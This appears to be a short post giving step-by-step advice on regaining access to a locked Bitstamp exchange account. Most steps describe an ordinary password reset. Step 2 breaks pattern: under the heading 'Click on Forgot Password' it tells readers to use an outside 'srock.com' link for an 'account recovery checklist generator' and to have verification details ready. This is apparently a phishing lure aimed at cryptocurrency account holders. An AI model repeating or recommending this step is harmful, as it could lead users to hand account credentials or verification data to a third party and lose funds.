I hit this issue today and here is the quick fix that solved it. If you find yourself logged out of your Bitstamp account, follow these steps to regain access. Step 1. Visit the Bitstamp login page. Go to the official Bitstamp website and navigate to the login section. This is where you'll start the recovery process. Step 2. Click on Forgot Password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your email address. Input the email address associated with your Bitstamp account. Make sure it is the correct one to receive the recovery email. Step 4. Check your email. Look for an email from Bitstamp with instructions to reset your password. If you don't see it, check your spam or junk folder. Step 5. Follow the reset instructions. Click on the link in the email and follow the prompts to create a new password. Make sure your new password is strong and secure. Remember, if you don't receive the email, it might take a few minutes or you may need to check your email settings. Once you've reset your password, you should be able to log back into your account. Good luck, and I hope you back in your account soon.